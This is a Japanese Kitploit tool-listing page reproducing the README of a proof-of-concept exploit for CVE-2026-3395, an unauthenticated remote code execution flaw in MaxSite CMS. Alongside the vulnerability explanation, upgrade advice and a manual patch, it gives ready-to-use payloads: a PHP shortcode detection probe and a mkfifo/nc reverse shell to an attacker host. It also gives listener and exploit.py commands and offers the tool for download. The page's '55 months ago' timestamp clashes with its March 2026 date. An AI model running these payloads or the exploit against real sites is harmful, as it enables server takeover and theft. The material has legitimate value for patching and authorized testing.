Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

MaxSite CMS <= 109.1 の MarkItUp エディタの AJAX エンドポイントを介した、認証不要のリモートコード実行の概念実証エクスプロイト。検出およびリバースシェルペイロードを備えています。

リポジトリを見る
55ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE‑2026‑3395 — MaxSite CMS 認証なしリモートコード実行

Author Country Instagram GitHub CVE Exploit Type CVSS

概要

MaxSite CMS ≤ 109.1 における認証なしリモートコード実行(RCE) の脆弱性。

この欠陥は、MarkItUp エディタプラグインの AJAX エンドポイントにおける脆弱な認可チェックと、run_php プラグインによるユーザー指定 PHP コードの安全でない実行が組み合わさることで発生します。

  • 発見・修正: 2026年3月
  • 修正バージョン: MaxSite CMS 109.2
  • ベンダー: MaxSite CMS
  • リポジトリ: maxsite/cms

説明

この脆弱性は、MarkItUp エディタプラグインの以下のファイルに影響します:

  • preview-ajax.php
  • autosave-post-ajax.php

これらのエンドポイントは:

  • 認証なしでアクセス可能
  • 弱いリファラ検証のみを実行(簡単にバイパス可能)
  • ユーザー入力を run_php プラグインに渡す
  • eval() を使用して [php]...[/php] ショートコードを実行

攻撃者は、data パラメータを介して Base64 エンコードされた内部パスと悪意のある PHP ペイロードを含む細工された POST リクエストを /ajax/ ルートに送信することで、以下を引き起こす可能性があります:

🚨 完全な認証なしリモートコード実行


攻撃フロー図

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

前提条件

  • MaxSite CMS バージョン ≤ 109.1
  • run_php プラグインが有効(一般的なデフォルト)
  • eval() を許可する PHP 設定

悪用

Python 3 の概念実証エクスプロイト(exploit.py)が含まれています。

検出ペイロード(非破壊的)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

リバースシェルペイロード

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

使用方法

1. リスナーを起動

root@kitploit:~
nc -lvnp 9001

2. エクスプロイトを実行

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

緩和策

即時対応

  • MaxSite CMS 109.2 以降にアップグレード
  • 不要な場合は run_php プラグインを無効化

手動パッチ

脆弱なファイルに認証チェックを追加:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

参考情報

  • パッチコミット https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • 脆弱性エントリ https://vuldb.com/?id.348281

  • NVD レコード https://nvd.nist.gov/vuln/detail/CVE-2026-3395


法的通知

このプロジェクトは以下を目的として提供されています:

  • セキュリティ研究
  • 教育目的
  • 許可されたペネトレーションテスト

⚠️ 明示的な許可なしにシステムに対して使用しないでください。

著者は誤用または損害について一切の責任を負いません。


著者

Mohammed Idrees Banyamer ヨルダン 🇯🇴 セキュリティリサーチャー

banyamer_security — Silent Hunter • Shadow Presence

2026年3月

ツールをダウンロード